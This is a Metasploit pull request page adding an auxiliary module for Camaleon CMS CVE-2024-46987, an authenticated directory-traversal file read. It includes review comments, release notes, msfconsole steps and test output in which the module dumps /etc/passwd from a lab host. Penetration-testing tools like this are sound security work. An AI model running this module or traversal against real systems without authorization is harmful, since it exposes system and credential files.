Camaleon CMS CVE 2024 46987 #21122
Merged
jheysel-r7 merged 14 commits into rapid7:master from Apr 17, 2026
Adds missing options to documentation
Makes verbose option not required
Changes VHOST option type - some reason "address" type domain names were marked as "invalid"
Updates documentation
Pull request overview
Adds a new Metasploit auxiliary gather module and documentation to exploit Camaleon CMS CVE-2024-46987 for authenticated arbitrary file read via directory traversal.
Changes:
- Introduces `auxiliary/gather/camaleon_traversal` module implementing authentication, version checking, and file retrieval.
- Adds user-facing documentation with verification steps, options, and an example run.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 10 comments.
| File | Description |
|---|---|
| modules/auxiliary/gather/camaleon_traversal.rb | New auxiliary module to authenticate to Camaleon CMS and attempt traversal-based file reads. |
| documentation/modules/auxiliary/gather/camaleon_traversal.md | New module documentation describing affected versions, usage, options, and example output. |
adfoster-r7 reviewed Mar 26, 2026
adfoster-r7 reviewed Mar 26, 2026
adfoster-r7 reviewed Mar 26, 2026
adfoster-r7 previously requested changes Mar 26, 2026
Removes unnecessary options
Removes credentials from logs
Refactors check method
Makes use of Rex::Version
Removes get_base_url in favor of relative filepaths in send_request_cgi
Other small changes
jheysel-r7 reviewed Apr 14, 2026
jheysel-r7 reviewed Apr 15, 2026
jheysel-r7 left a comment
Thank you @bootstrapbool. Just a couple comments.
Testing
```
msf auxiliary(gather/camaleon_traversal) > run
[*] Running module against 172.16.199.136
[+] /etc/passwd stored as '/Users/jheysel/.msf4/loot/20260415100322_default_172.16.199.136_camaleon.travers_869551.txt'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
whoopsie:x:117:124::/nonexistent:/bin/false
sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
msfuser:x:1000:1000:msfuser,,,:/home/msfuser:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
postgres:x:129:136:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
```
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Places rails version check after downgrading concurrent-ruby
jheysel-r7 approved these changes Apr 17, 2026
Release Notes
This adds an auxiliary module to exploit an arbitrary file vulnerability, CVE-2024-46987, on Camaleon CMS >= 2.8.0 as well as 2.9.0
This change adds a module to exploit CVE-2024-46987 resulting in reading arbitrary files on Camaleon CMS >= 2.8.0 as well as 2.9.0
Verification
List the steps needed to make sure this thing works
- `msfconsole`
- `use auxiliary/gather/camaleon_traversal`
- `set rhost {target host}`
- `set rport {target port}`
- `run`

*pcap sent to msfdev@metasploit.com